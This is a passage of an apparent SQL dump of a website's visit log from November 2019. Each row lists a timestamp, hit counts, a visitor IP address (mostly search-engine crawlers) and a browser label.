463377,1574481170,20,20,0,0,'66.249.69.62','chrome'),(463378,1574481181,1,1,0,0,'141.8.142.164','other'),(463379,1574481190,8,8,0,0,'66.249.69.34','chrome'),(463380,1574481729,2,2,0,0,'66.249.69.37','chrome'),(463381,1574481775,1,1,0,0,'157.55.39.139','other'),(463382,1574481955,1,1,0,0,'66.249.75.100','chrome'),(463383,1574482069,1,1,0,0,'157.55.39.182','other'),(463384,1574482106,4,4,0,0,'66.249.69.34','chrome'),(463385,1574482200,1,1,0,0,'66.249.75.126','chrome'),(463386,1574482326,2,2,0,0,'66.249.75.97','chrome'),(463387,1574482377,8,8,0,0,'66.249.69.62','chrome'),(463388,1574483046,1,1,0,0,'66.249.75.165','chrome'),(463389,1574483152,7,7,0,0,'66.249.69.126','chrome'),(463390,1574483168,1,1,0,0,'157.55.39.139','other'),(463391,1574483220,26,26,0,0,'66.249.75.64','chrome'),(463392,1574483248,8,8,0,0,'66.249.75.66','chrome'),(463393,1574483329,4,4,0,0,'66.249.69.97','chrome'),(463394,1574483703,3,3,0,0,'66.249.69.100','chrome'),(463395,1574483712,1,1,0,0,'5.45.207.49','other'),(463396,1574483824,2,2,0,0,'66.249.75.68','chrome'),(463397,1574484084,2,2,0,0,'91.209.11.236','other'),(463398,1574484191,15,15,0,0,'66.249.75.64','chrome'),(463399,1574484211,2,2,0,0,'66.249.69.126','chrome'),(463400,1574484355,1,1,0,0,'157.55.39.141','other'),(463401,1574484420,1,1,0,0,'157.55.39.62','other'),(463402,1574484447,5,5,0,0,'66.249.75.66','chrome'),(463403,1574484449,4,4,0,0,'66.249.69.97','chrome'),(463404,1574484662,1,1,0,0,'157.55.39.182','other'),(463405,1574485177,2,2,0,0,'91.209.11.236','other'),(463406,1574485581,1,1,0,0,'66.249.69.100','chrome'),(463407,1574485647,4,4,0,0,'66.249.75.66','chrome'),(463408,1574485675,4,4,0,0,'66.249.69.97','chrome'),(463409,1574485706,12,12,0,0,'66.249.75.64','chrome'),(463410,1574485820,7,7,0,0,'66.249.69.126','chrome'),(463411,1574485943,2,2,0,0,'66.249.75.68','chrome'),(463412,1574486445,2,2,0,0,'91.209.11.236','other'),(463413,1574486509,1,1,0,0,'207.46.13.202','other'),(463414,1574486779,3,3,0,0,'66.249.69.97','chrome'),(463415,1574486865,11,11,0,0,'66.249.75.64','chrome'),(463416,1574486877,1,1,0,0,'66.249.69.126','chrome'),(463417,1574486958,4,4,0,0,'66.249.75.66','chrome'),(463418,1574487006,2,2,0,0,'66.249.75.68','chrome'),(463419,1574487729,1,1,0,0,'66.249.69.97','chrome'),(463420,1574488244,1,1,0,0,'207.46.13.202','other'),(463421,1574489057,1,1,0,0,'37.55.18.7','chrome'),(463422,1574489195,1,1,0,0,'157.55.39.182','other'),(463423,1574489257,1,1,0,0,'66.249.75.66','chrome'),(463424,1574489384,1,1,0,0,'207.46.13.202','other'),(463425,1574489437,1,1,0,0,'8.29.198.25','other'),(463426,1574489839,1,1,0,0,'66.249.75.68','chrome'),(463427,1574490607,1,1,0,0,'66.249.75.66','chrome'),(463428,1574490800,1,1,0,0,'8.29.198.25','other'),(463429,1574491136,1,1,0,0,'66.249.75.64','chrome'),(463430,1574491422,1,1,0,0,'157.55.39.182','other'),(463431,1574491439,1,1,0,0,'46.211.155.1','chrome'),(463432,1574491943,1,1,0,0,'141.8.183.33','other'),(463433,1574492382,1,1,0,0,'207.46.13.202','other'),(463434,1574492549,1,1,0,0,'66.249.75.68','chrome'),(463435,1574492636,1,1,0,0,'66.249.69.126','chrome'),(463436,1574492739,1,1,0,0,'91.196.178.47','chrome'),(463437,1574492871,1,1,0,0,'31.13.115.5','other'),(463438,1574492873,1,1,0,0,'173.252.127.29','other'),(463439,1574492973,1,1,0,0,'157.55.39.62','other'),(463440,1574493450,3,3,0,0,'91.209.11.236','other'),(463441,1574493497,1,1,0,0,'66.249.75.66','chrome'),(463442,1574494336,1,1,0,0,'31.13.127.22','other'),(463443,1574494388,3,3,0,0,'31.13.127.13','other'),(463444,1574494389,6,6,0,0,'31.13.127.12','other'),(463445,1574494390,4,4,0,0,'31.13.127.18','other'),(463451,1574494391,6,6,0,0,'31.13.127.2','other'),(463456,1574494425,2,2,0,0,'91.209.11.236','other'),(463457,1574494467,1,1,0,0,'178.154.200.71','other'),(463458,1574494722,1,1,0,0,'157.55.39.62','other'),(463459,1574494982,1,0,1,0,'66.249.69.100',''),(463460,1574495175,1,1,0,0,'66.249.69.126','chrome'),(463461,1574495262,1,1,0,0,'66.249.75.66','chrome'),(463462,1574495406,1,1,0,0,'91.209.11.236','other'),(463463,1574496488,2,2,0,0,'66.249.75.64','chrome'),(463464,1574496554,3,3,0,0,'66.249.75.66','chrome'),(463465,1574497412,2,2,0,0,'157.55.39.62','other'),(463466,1574497871,5,5,0,0,'66.249.75.66','chrome'),(463467,1574497914,7,7,0,0,'66.249.75.64','chrome'),(463468,1574498061,1,1,0,0,'66.249.69.97','chrome'),(463469,1574498155,2,2,0,0,'167.86.70.217','other'),(463470,1574498433,3,3,0,0,'35.184.175.75','other'),(463471,1574498620,1,1,0,0,'37.9.113.163','other'),(463472,1574499880,1,1,0,0,'37.54.20.16','chrome'),(463473,1574499917,2,2,0,0,'66.249.75.68','chrome'),(463474,1574499942,3,3,0,0,'66.249.69.126','chrome'),(463475,1574499943,3,3,0,0,'66.249.75.66','chrome'),(463476,1574499956,3,3,0,0,'66.249.75.64','chrome'),(463477,1574499967,1,1,0,0,'37.9.113.33','other'),(463478,1574499981,1,1,0,0,'66.249.69.97','chrome'),(463479,1574500319,1,1,0,0,'8.29.198.27','other'),(463480,1574501270,1,1,0,0,'46.211.149.95','chrome'),(463481,1574501276,3,3,0,0,'66.249.75.64','chrome'),(463482,1574501280,2,2,0,0,'66.249.75.66','chrome'),(463483,1574501289,1,1,0,0,'141.8.132.37','other'),(463484,1574501307,1,1,0,0,'66.249.69.126','chrome'),(463485,1574501315,1,1,0,0,'141.8.132.2','other'),(463486,1574501369,1,1,0,0,'66.249.75.68','chrome'),(463487,1574501434,1,1,0,0,'66.249.69.100','chrome'),(463488,1574501699,1,1,0,0,'8.29.198.27','other'),(463489,1574501701,1,1,0,0,'207.46.13.4','other'),(463490,1574502658,8,8,0,0,'66.249.75.64','chrome'),(463491,1574502736,2,2,0,0,'66.249.69.126','chrome'),(463492,1574502740,3,3,0,0,'66.249.75.68','chrome'),(463493,1574502875,1,1,0,0,'209.17.97.74','other'),(463494,1574503288,5,5,0,0,'66.249.75.66','chrome'),(463495,1574504089,1,1,0,0,'66.249.69.126','chrome'),(463496,1574504093,8,8,0,0,'66.249.75.64','chrome'),(463497,1574504202,4,4,0,0,'66.249.75.66','chrome'),(463498,1574504227,2,2,0,0,'66.249.75.68','chrome'),(463499,1574504589,1,1,0,0,'213.159.213.137','firefox'),(463500,1574506435,1,1,0,0,'37.9.113.10','other'),(463501,1574506512,2,2,0,0,'66.249.75.64','chrome'),(463502,1574506753,1,1,0,0,'91.210.251.159','chrome'),(463503,1574506754,1,1,0,0,'31.13.127.1','other'),(463504,1574507055,1,1,0,0,'109.74.154.72','chrome'),(463505,1574508736,1,0,1,0,'51.83.19.253',''),(463506,1574509281,1,1,0,0,'157.55.39.234','other'),(463507,1574509438,1,1,0,0,'66.249.75.66','chrome'),(463508,1574510271,1,1,0,0,'157.55.39.234','other'),(463509,1574510281,1,1,0,0,'217.23.186.202','chrome'),(463510,1574510489,1,1,0,0,'157.55.39.49','other'),(463511,1574510515,1,1,0,0,'66.249.75.66','chrome'),(463512,1574510531,1,1,0,0,'66.249.69.100','chrome'),(463513,1574510547,6,6,0,0,'66.249.75.64','chrome'),(463514,1574510633,1,1,0,0,'13.66.139.0','other'),(463515,1574511060,1,1,0,0,'66.249.69.126','chrome'),(463516,1574511196,1,1,0,0,'8.29.198.27','other'),(463517,1574511549,1,1,0,0,'157.55.39.117','other'),(463518,1574511554,1,1,0,0,'178.133.56.89','chrome'),(463519,1574512082,1,1,0,0,'141.8.142.177','other'),(463520,1574512109,2,2,0,0,'157.55.39.49','other'),(463521,1574512554,1,1,0,0,'8.29.198.25','other'),(463522,1574513246,1,1,0,0,'157.55.39.117','other'),(463523,1574513907,5,5,0,0,'66.249.75.66','chrome'),(463524,1574514171,1,1,0,0,'51.68.152.26','chrome'),(463525,1574514390,2,2,0,0,'66.249.69.126','chrome'),(463526,1574514403,6,6,0,0,'66.249.75.64','chrome'),(463527,1574514450,1,1,0,0,'94.231.182.40','firefox'),(463528,1574514652,1,1,0,0,'66.249.75.68','chrome'),(463529,1574515162,1,1,0,0,'46.211.159.208','chrome'),(463530,1574515632,1,1,0,0,'37.54.87.242','chrome'),(463531,1574515890,1,1,0,0,'141.8.132.37','other'),(463532,1574516225,1,1,0,0,'157.55.39.49','other'),(463533,1574516607,1,1,0,0,'80.93.124.42','msie'),(463534,1574517568,8,8,0,0,'66.249.75.64','chrome'),(463535,1574517628,3,3,0,0,'66.249.75.66','chrome'),(463536,1574517641,1,1,0,0,'66.249.69.100','chrome'),(463537,1574517880,2,2,0,0,'66.249.69.126','chrome'),(463538,1574518256,2,2,0,0,'66.249.75.68','chrome'),(463539,1574518676,1,1,0,0,'157.55.39.49','other'),(463540,1574518844,1,1,0,0,'141.8.188.12','other'),(463541,1574519366,16,16,0,0,'66.249.75.64','chrome'),(463542,1574519449,7,7,0,0,'66.249.75.66','chrome'),(463543,1574519460,3,3,0,0,'66.249.75.68','chrome'),(463544,1574519478,5,5,0,0,'66.249.69.126','chrome'),(463545,1574519564,3,3,0,0,'66.249.69.100','chrome'),(463546,1574519899,1,1,0,0,'46.211.141.96','chrome'),(463547,1574519927,2,2,0,0,'95.134.51.51','firefox'),(463548,1574520287,7,7,0,0,'66.249.75.64','chrome'),(463549,1574520365,4,4,0,0,'66.249.75.66','chrome'),(463550,1574520369,1,1,0,0,'66.249.66.134','chrome'),(463551,1574520931,3,3,0,0,'66.249.75.68','chrome'),(463552,1574521124,1,1,0,0,'66.249.69.97','chrome'),(463553,1574521594,3,3,0,0,'66.249.75.66','chrome'),(463554,1574521686,3,3,0,0,'66.249.69.126','chrome'),(463555,1574521828,4,4,0,0,'66.249.75.64','chrome'),(463556,1574521866,1,1,0,0,'66.249.75.68','chrome'),(463557,1574522051,1,1,0,0,'8.29.198.26','other'),(463558,1574522415,3,3,0,0,'34.68.102.245','chrome'),(463559,1574522431,7,7,0,0,'35.184.44.51','chrome'),(463560,1574522463,2,2,0,0,'23.251.147.36','chrome'),(463562,1574522478,3,3,0,0,'35.188.10.171','chrome'),(463563,1574523130,5,5,0,0,'66.249.75.66','chrome'),(463564,1574523257,7,7,0,0,'66.249.75.64','chrome'),(463565,1574523420,1,1,0,0,'8.29.198.26','other'),(463566,1574523509,2,2,0,0,'66.249.69.100','chrome'),(463567,1574523623,1,1,0,0,'66.249.69.97','chrome'),(463568,1574523948,1,1,0,0,'66.249.69.126','chrome'),(463569,1574524119,1,1,0,0,'5.45.207.49','other'),(463570,1574524566,1,1,0,0,'66.249.75.66','chrome'),(463571,1574524645,4,4,0,0,'66.249.75.64','chrome'),(463572,1574524688,1,1,0,0,'66.249.75.68','chrome'),(463573,1574524697,2,2,0,0,'66.249.69.100','chrome'),(463574,1574525273,2,2,0,0,'66.249.69.97','chrome'),(463575,1574525473,2,2,0,0,'66.249.69.126','chrome'),(463576,1574525660,1,1,0,0,'66.249.75.66','chrome'),(463577,1574526203,1,1,0,0,'66.249.75.68','chrome'),(463578,1574526769,5,5,0,0,'66.249.69.97','chrome'),(463579,1574526775,1,1,0,0,'37.146.240.155','msie'),(463580,1574526845,4,4,0,0,'66.249.69.100','chrome'),(463581,1574526904,22,22,0,0,'66.249.75.64','chrome'),(463582,1574526917,3,3,0,0,'66.249.75.66','chrome'),(463583,1574526926,8,8,0,0,'66.249.69.126','chrome'),(463584,1574527324,8,8,0,0,'66.249.75.68','chrome'),(463585,1574527450,1,1,0,0,'66.249.79.222','chrome'),(463586,1574527896,29,29,0,0,'66.249.75.64','chrome'),(463587,1574527915,10,10,0,0,'66.249.69.126','chrome'),(463588,1574528022,9,9,0,0,'66.249.69.97','chrome'),(463589,1574528045,16,16,0,0,'66.249.75.66','chrome'),(463590,1574528086,1,1,0,0,'207.46.13.113','other'),(463591,1574528225,4,4,0,0,'66.249.69.100','chrome'),(463592,1574528393,2,2,0,0,'66.249.75.68','chrome'),(463593,1574528840,44,44,0,0,'66.249.75.64','chrome'),(463594,1574528874,20,20,0,0,'66.249.69.126','chrome'),(463595,1574528956,7,7,0,0,'66.249.69.97','chrome'),(463596,1574528961,7,7,0,0,'66.249.75.66','chrome'),(463597,1574529466,1,1,0,0,'66.249.69.100','chrome'),(463598,1574529488,3,3,0,0,'66.249.75.68','chrome'),(463599,1574529778,18,18,0,0,'66.249.75.64','chrome'),(463600,1574529855,5,5,0,0,'66.249.69.126','chrome'),(463601,1574530437,2,2,0,0,'66.249.69.97','chrome'),(463602,1574530464,1,1,0,0,'66.249.69.100','chrome'),(463603,1574530657,3,3,0,0,'66.249.75.66','chrome'),(463604,1574530953,1,1,0,0,'66.249.75.64','chrome'),(463605,1574530973,1,1,0,0,'66.249.69.126','chrome'),(463606,1574531830,1,1,0,0,'141.8.142.2','other'),(463607,1574531941,1,1,0,0,'185.155.33.9','chrome'),(463608,1574531968,1,1,0,0,'141.8.132.19','other'),(463609,1574532216,25,25,0,0,'45.132.138.8','chrome'),(463610,1574532266,1,1,0,0,'66.249.69.97','chrome'),(463611,1574532312,1,1,0,0,'178.205.51.251','chrome'),(463612,1574532925,5,5,0,0,'66.249.75.64','chrome'),(463613,1574532928,3,3,0,0,'66.249.69.100','chrome'),(463614,1574532930,1,1,0,0,'8.29.198.27','other'),(463615,1574533218,1,1,0,0,'207.182.140.210','other'),(463616,1574533228,2,2,0,0,'66.249.75.68','chrome'),(463617,1574533260,1,1,0,0,'66.249.69.126','chrome'),(463618,1574534270,1,1,0,0,'8.29.198.27','other'),(463619,1574535161,1,1,0,0,'66.249.75.64','chrome'),(463620,1574535845,1,1,0,0,'207.46.13.33','other'),(463621,1574535952,1,1,0,0,'66.249.75.68','chrome'),(463622,1574536157,8,8,0,0,'66.249.75.64','chrome'),(463623,1574536391,1,1,0,0,'157.55.39.119','other'),(463624,1574536847,1,1,0,0,'91.196.178.91','chrome'),(463625,1574537058,3,3,0,0,'66.249.75.68','chrome'),(463626,1574537067,4,4,0,0,'66.249.75.66','chrome'),(463627,1574537164,1,1,0,0,'185.244.149.59','chrome'),(463628,1574537556,1,1,0,0,'176.36.21.189','chrome'),(463629,1574537598,2,2,0,0,'66.249.75.64','chrome'),(463630,1574539288,1,0,1,0,'66.249.75.68',''),(463631,1574539519,1,1,0,0,'66.249.75.68','chrome'),(463632,1574539553,1,1,0,0,'157.55.39.119','other'),(463633,1574539895,1,1,0,0,'66.249.69.126','chrome'),(463634,1574540917,1,0,1,0,'66.249.75.64',''),(463635,1574541104,2,2,0,0,'66.249.75.68','chrome'),(463636,1574541323,1,1,0,0,'66.249.75.64','chrome'),(463637,1574541817,1,1,0,0,'157.55.39.10','other'),(463638,1574542296,1,1,0,0,'66.249.75.64','chrome'),(463639,1574542810,1,1,0,0,'207.46.13.33','other'),(463640,1574543329,1,1,0,0,'66.249.69.100','chrome'),(463641,1574543799,1,1,0,0,'8.29.198.26','other'),(463642,1574544132,1,1,0,0,'66.249.69.126','chrome'),(463643,1574544219,1,1,0,0,'66.249.75.68','chrome'),(463644,1574545115,1,1,0,0,'8.29.198.27','other'),(463645,1574545372,1,1,0,0,'141.8.188.12','other'),(463646,1574545895,1,1,0,0,'66.249.75.66','chrome'),(463647,1574546162,1,1,0,0,'157.55.39.10','other'),(463648,1574546675,1,1,0,0,'66.249.75.64','chrome'),(463649,1574546912,1,1,0,0,'141.8.142.115','other'),(463650,1574547237,2,2,0,0,'66.249.69.97','chrome'),(463651,1574547556,1,1,0,0,'157.55.39.10','other'),(463652,1574547972,5,5,0,0,'66.249.75.66','chrome'),(463653,1574548038,7,7,0,0,'66.249.75.64','chrome'),(463654,1574548053,1,1,0,0,'66.249.69.100','chrome'),(463655,1574548173,2,2,0,0,'66.249.69.126','chrome'),(463656,1574549182,1,1,0,0,'66.249.75.68','chrome'),(463657,1574549234,1,1,0,0,'13.66.139.0','other'),(463658,1574549770,1,1,0,0,'37.9.113.177','other'),(463659,1574550044,1,1,0,0,'85.254.72.25','chrome'),(463660,1574550915,1,1,0,0,'13.66.139.0','other'),(463661,1574551139,3,3,0,0,'66.249.75.68','chrome'),(463662,1574551738,6,6,0,0,'66.249.75.66','chrome'),(463663,1574551750,27,27,0,0,'66.249.75.64','chrome'),(463664,1574551780,2,2,0,0,'66.249.69.100','chrome'),(463665,1574551844,4,4,0,0,'66.249.69.126','chrome'),(463666,1574551889,2,2,0,0,'66.249.69.97','chrome'),(463667,1574552655,1,1,0,0,'141.8.142.2','other'),(463668,1574552676,2,2,0,0,'66.249.75.66','chrome'),(463669,1574552760,1,1,0,0,'66.249.75.68','chrome'),(463670,1574553274,2,2,0,0,'66.249.75.64','chrome'),(463671,1574553562,1,1,0,0,'157.55.39.10','other'),(463672,1574553568,1,1,0,0,'3.134.245.119','chrome'),(463673,1574554138,1,1,0,0,'207.46.13.33','other'),(463674,1574554141,1,1,0,0,'66.249.75.66','chrome'),(463675,1574554188,1,1,0,0,'141.8.142.177','other'),(463676,1574554346,1,1,0,0,'178.154.200.71','other'),(463677,1574554655,1,1,0,0,'8.29.198.26','other'),(463678,1574555156,5,5,0,0,'66.249.75.64','chrome'),(463679,1574555182,2,2,0,0,'66.249.75.68','chrome'),(463680,1574555188,10,10,0,0,'66.249.75.66','chrome'),(463681,1574555220,1,1,0,0,'66.249.69.100','chrome'),(463682,1574555261,3,3,0,0,'66.249.69.97','chrome'),(463683,1574555853,1,1,0,0,'66.249.69.126','chrome'),(463684,1574555977,1,1,0,0,'8.29.198.27','other'),(463685,1574556841,1,1,0,0,'66.249.75.68','chrome'),(463686,1574557216,1,1,0,0,'66.249.75.64','chrome'),(463687,1574557473,1,1,0,0,'207.46.13.33','other'),(463688,1574557968,1,1,0,0,'31.13.115.18','other'),(463689,1574557969,2,2,0,0,'31.13.115.19','other'),(463691,1574558291,2,2,0,0,'66.249.75.66','chrome'),(463692,1574558580,4,4,0,0,'66.249.75.68','chrome'),(463693,1574558971,23,23,0,0,'66.249.75.64','chrome'),(463694,1574558972,2,2,0,0,'66.249.69.100','chrome'),(463695,1574559080,4,4,0,0,'66.249.69.97','chrome'),(463696,1574559143,8,8,0,0,'66.249.69.126','chrome'),(463697,1574559201,8,8,0,0,'66.249.75.66','chrome'),(463698,1574559849,1,1,0,0,'66.249.75.68','chrome'),(463699,1574559878,2,2,0,0,'66.249.75.64','chrome'),(463700,1574560137,1,1,0,0,'199.127.56.236','chrome'),(463701,1574560202,1,1,0,0,'54.185.67.34','other'),(463702,1574560431,1,1,0,0,'66.249.69.100','chrome'),(463703,1574560484,1,1,0,0,'66.249.69.126','chrome'),(463704,1574561796,4,4,0,0,'66.249.75.68','chrome'),(463705,1574561814,2,2,0,0,'66.249.69.100','chrome'),(463706,1574561822,9,9,0,0,'66.249.75.66','chrome'),(463707,1574561916,31,31,0,0,'66.249.75.64','chrome'),(463708,1574561976,9,9,0,0,'66.249.69.126','chrome'),(463709,1574562052,5,5,0,0,'66.249.69.97','chrome'),(463710,1574562063,1,1,0,0,'213.180.203.37','other'),(463711,1574563086,2,2,0,0,'66.249.75.66','chrome'),(463712,1574565056,3,3,0,0,'207.46.13.127','other'),(463713,1574565521,1,1,0,0,'8.29.198.27','other'),(463714,1574565567,1,1,0,0,'207.46.13.33','other'),(463715,1574565826,9,9,0,0,'66.249.75.64','chrome'),(463716,1574565839,3,3,0,0,'66.249.75.66','chrome'),(463717,1574565865,2,2,0,0,'66.249.69.97','chrome'),(463718,1574566433,1,1,0,0,'66.249.69.126','chrome'),(463719,1574566818,1,1,0,0,'8.29.198.25','other'),(463720,1574566945,2,2,0,0,'66.249.75.66','chrome'),(463721,1574567673,1,1,0,0,'66.249.69.126','chrome'),(463722,1574567783,1,1,0,0,'66.249.69.100','chrome'),(463723,1574568798,1,1,0,0,'66.249.75.64','chrome'),(463724,1574568864,1,1,0,0,'66.249.69.126','chrome'),(463725,1574569710,3,3,0,0,'66.249.75.68','chrome'),(463726,1574569740,2,2,0,0,'66.249.75.66','chrome'),(463727,1574569789,7,7,0,0,'66.249.75.64','chrome'),(463728,1574571424,23,23,0,0,'45.139.50.26','chrome'),(463729,1574571707,1,1,0,0,'66.249.75.66','chrome'),(463730,1574571751,2,2,0,0,'66.249.75.68','chrome'),(463731,1574572373,1,1,0,0,'207.46.13.33','other'),(463732,1574572940,2,2,0,0,'66.249.75.64','chrome'),(463733,1574572954,1,1,0,0,'66.249.75.66','chrome'),(463734,1574573532,1,1,0,0,'46.211.133.137','chrome'),(463735,1574573571,1,1,0,0,'141.8.142.119','other'),(463736,1574573949,1,1,0,0,'66.249.75.64','chrome'),(463737,1574574349,1,1,0,0,'207.46.13.33','other'),(463738,1574575109,1,1,0,0,'66.249.75.64','chrome'),(463739,1574575482,2,2,0,0,'66.249.64.27','chrome'),(463740,1574575834,1,1,0,0,'66.249.64.28','chrome'),(463741,1574576135,1,1,0,0,'91.196.178.129','firefox'),(463742,1574576376,1,1,0,0,'8.29.198.26','other'),(463743,1574576487,2,2,0,0,'66.249.70.33','chrome'),(463744,1574576561,2,2,0,0,'66.249.70.36','chrome'),(463745,1574576586,1,1,0,0,'37.55.224.214','chrome'),(463746,1574576588,1,1,0,0,'66.249.64.27','chrome'),(463747,1574577068,1,1,0,0,'66.249.64.26','chrome'),(463748,1574577350,3,3,0,0,'207.46.13.33','other'),(463749,1574577456,1,1,0,0,'66.249.64.28','chrome'),(463750,1574577665,1,1,0,0,'8.29.198.27','other'),(463751,1574577828,1,1,0,0,'91.196.178.129','firefox'),(463752,1574578508,1,1,0,0,'207.46.13.33','other'),(463753,1574578553,1,1,0,0,'66.249.64.28','chrome'),(463754,1574578713,1,1,0,0,'66.249.70.33','chrome'),(463755,1574579554,2,2,0,0,'66.249.64.27','chrome'),(463756,1574580236,8,8,0,0,'66.249.64.26','chrome'),(463757,1574580353,1,1,0,0,'66.249.70.33','chrome'),(463758,1574580368,2,2,0,0,'66.249.64.28','chrome'),(463759,1574580634,1,1,0,0,'66.249.70.36','chrome'),(463760,1574580869,1,0,1,0,'66.249.70.62',''),(463761,1574580875,2,2,0,0,'66.249.64.27','chrome'),(463762,1574580885,1,1,0,0,'91.209.11.236','other'),(463763,1574580958,2,2,0,0,'66.249.70.62','chrome'),(463764,1574581605,1,1,0,0,'66.249.64.26','chrome'),(463765,1574583558,11,11,0,0,'66.249.64.26','chrome'),(463766,1574584039,2,2,0,0,'207.46.13.20','other'),(463767,1574584040,1,1,0,0,'207.46.13.72','other'),(463768,1574584049,2,2,0,0,'157.55.39.235','other'),(463769,1574584225,5,5,0,0,'66.249.64.28','chrome'),(463770,1574584230,9,9,0,0,'66.249.64.27','chrome'),(463771,1574584255,3,3,0,0,'66.249.70.62','chrome'),(463772,1574584280,3,3,0,0,'66.249.70.36','chrome'),(463773,1574584476,5,5,0,0,'66.249.64.26','chrome'),(463774,1574584556,4,4,0,0,'66.249.70.33','chrome'),(463775,1574585031,1,1,0,0,'94.230.208.148','other'),(463776,1574585496,1,1,0,0,'66.249.64.28','chrome'),(463777,1574585585,1,1,0,0,'66.249.70.36','chrome'),(463778,1574586429,1,1,0,0,'66.249.64.26','chrome'),(463779,1574586623,2,2,0,0,'66.249.64.27','chrome'),(463780,1574586750,1,1,0,0,'66.249.64.28','chrome'),(463781,1574586864,1,1,0,0,'87.250.224.90','other'),(463782,1574587229,1,1,0,0,'8.29.198.27','other'),(463783,1574587625,7,7,0,0,'66.249.64.26','chrome'),(463784,1574587681,2,2,0,0,'66.249.64.28','chrome'),(463785,1574587684,3,3,0,0,'66.249.70.62','chrome'),(463786,1574587952,2,2,0,0,'66.249.70.33','chrome'),(463787,1574587954,6,6,0,0,'66.249.64.27','chrome'),(463788,1574588414,1,1,0,0,'157.55.39.235','other'),(463789,1574588512,1,1,0,0,'8.29.198.25','other'),(463790,1574589222,1,1,0,0,'66.249.70.33','chrome'),(463791,1574589278,2,2,0,0,'66.249.64.28','chrome'),(463792,1574590773,2,2,0,0,'66.249.64.27','chrome'),(463793,1574590881,12,12,0,0,'66.249.64.26','chrome'),(463794,1574590926,1,1,0,0,'58.250.125.119','other'),(463795,1574591590,4,4,0,0,'66.249.70.33','chrome'),(463796,1574591606,3,3,0,0,'66.249.70.62','chrome'),(463797,1574591903,7,7,0,0,'66.249.64.26','chrome'),(463798,1574592098,4,4,0,0,'66.249.64.28','chrome'),(463799,1574592297,7,7,0,0,'66.249.64.27','chrome'),(463800,1574592544,5,5,0,0,'66.249.70.33','chrome'),(463801,1574592555,3,3,0,0,'66.249.70.62','chrome'),(463802,1574593021,1,1,0,0,'66.249.70.36','chrome'),(463803,1574593030,2,2,0,0,'66.249.64.26','chrome'),(463804,1574593502,5,5,0,0,'66.249.64.28','chrome'),(463805,1574593624,1,1,0,0,'109.74.154.72','chrome'),(463806,1574594137,22,22,0,0,'66.249.64.26','chrome'),(463807,1574594178,3,3,0,0,'66.249.70.36','chrome'),(463808,1574594194,4,4,0,0,'66.249.64.27','chrome'),(463809,1574594209,3,3,0,0,'66.249.70.33','chrome'),(463810,1574594265,1,1,0,0,'207.46.13.40','other'),(463811,1574594413,2,2,0,0,'66.249.70.62','chrome'),(463812,1574595194,2,2,0,0,'66.249.64.28','chrome'),(463813,1574595262,3,3,0,0,'66.249.64.27','chrome'),(463814,1574595272,2,2,0,0,'66.249.64.26','chrome'),(463815,1574595878,1,1,0,0,'207.46.13.40','other'),(463816,1574596324,1,1,0,0,'157.55.39.235','other'),(463817,1574596348,1,1,0,0,'66.249.64.28','chrome'),(463818,1574596363,3,3,0,0,'66.249.64.26','chrome'),(463819,1574596924,1,1,0,0,'66.249.64.27','chrome'),(463820,1574597153,1,1,0,0,'207.46.13.208','other'),(463821,1574597451,6,6,0,0,'66.249.64.26','chrome'),(463822,1574597988,4,4,0,0,'66.249.64.27','chrome'),(463823,1574598059,1,1,0,0,'66.249.70.36','chrome'),(463824,1574598110,1,1,0,0,'8.29.198.26','other'),(463825,1574598169,2,2,0,0,'66.249.70.33','chrome'),(463826,1574598186,3,3,0,0,'66.249.64.28','chrome'),(463827,1574598221,1,1,0,0,'66.249.70.62','chrome'),(463828,1574599123,1,1,0,0,'46.119.23.239','firefox'),(463829,1574599358,1,1,0,0,'8.29.198.25','other'),(463830,1574599434,2,2,0,0,'66.249.70.62','chrome'),(463831,1574599457,3,3,0,0,'66.249.64.26','chrome'),(463832,1574599495,1,1,0,0,'66.249.64.27','chrome'),(463833,1574600284,1,1,0,0,'66.249.70.36','chrome'),(463834,1574600927,1,1,0,0,'66.249.64.28','chrome'),(463835,1574601369,4,4,0,0,'66.249.64.26','chrome'),(463836,1574601543,1,1,0,0,'207.46.13.109','other'),(463837,1574601750,2,2,0,0,'31.13.127.18','other'),(463838,1574601751,1,1,0,0,'31.13.127.24','other'),(463840,1574601753,1,1,0,0,'91.196.178.187','chrome'),(463841,1574602012,3,3,0,0,'66.249.64.27','chrome'),(463842,1574602037,2,2,0,0,'66.249.64.28','chrome'),(463843,1574602194,1,1,0,0,'66.249.70.36','chrome'),(463844,1574603312,1,1,0,0,'66.249.70.33','chrome'),(463845,1574603326,3,3,0,0,'66.249.64.27','chrome'),(463846,1574603394,1,1,0,0,'66.249.64.28','chrome'),(463847,1574604642,1,1,0,0,'66.249.64.26','chrome'),(463848,1574605546,1,1,0,0,'188.163.112.108','firefox'),(463849,1574605855,2,2,0,0,'66.249.64.28','chrome'),(463850,1574605882,1,1,0,0,'66.249.64.27','chrome'),(463851,1574605896,4,4,0,0,'66.249.64.26','chrome'),(463852,1574606710,1,1,0,0,'207.46.13.109','other'),(463853,1574606730,1,1,0,0,'207.46.13.234','other'),(463854,1574607297,2,2,0,0,'66.249.64.26','chrome'),(463855,1574607821,3,3,0,0,'66.249.64.27','chrome'),(463856,1574608445,1,1,0,0,'66.249.64.28','chrome'),(463857,1574608453,1,1,0,0,'66.249.70.36','chrome'),(463858,1574608515,2,2,0,0,'66.249.70.62','chrome'),(463859,1574608558,1,1,0,0,'66.249.64.26','chrome'),(463860,1574608964,1,1,0,0,'8.29.198.26','other'),(463861,1574609391,2,2,0,0,'66.249.64.28','chrome'),(463862,1574609404,1,1,0,0,'66.249.70.36','chrome'),(463863,1574610261,1,1,0,0,'8.29.198.25','other'),(463864,1574610333,1,1,0,0,'207.46.13.208','other'),(463865,1574610643,1,1,0,0,'178.137.29.8','firefox'),(463866,1574610891,7,7,0,0,'66.249.64.27','chrome'),(463867,1574610897,4,4,0,0,'66.249.64.26','chrome'),(463868,1574611199,1,1,0,0,'66.249.70.36','chrome'),(463869,1574611761,1,1,0,0,'66.249.70.62','chrome'),(463870,1574611802,2,2,0,0,'66.249.64.28','chrome'),(463871,1574611810,1,1,0,0,'66.249.64.27','chrome'),(463872,1574611840,3,3,0,0,'66.249.64.26','chrome'),(463873,1574611875,1,1,0,0,'207.46.13.234','other'),(463874,1574612357,1,1,0,0,'141.8.142.119','other'),(463875,1574612468,1,1,0,0,'141.8.132.19','other'),(463876,1574612852,2,2,0,0,'66.249.70.33','chrome'),(463877,1574612859,2,2,0,0,'66.249.64.26','chrome'),(463878,1574613166,1,1,0,0,'66.249.70.36','chrome'),(463879,1574613285,1,1,0,0,'66.249.70.62','chrome'),(463880,1574613929,1,1,0,0,'141.8.183.15','other'),(463881,1574613930,1,1,0,0,'37.9.113.39','other'),(463882,15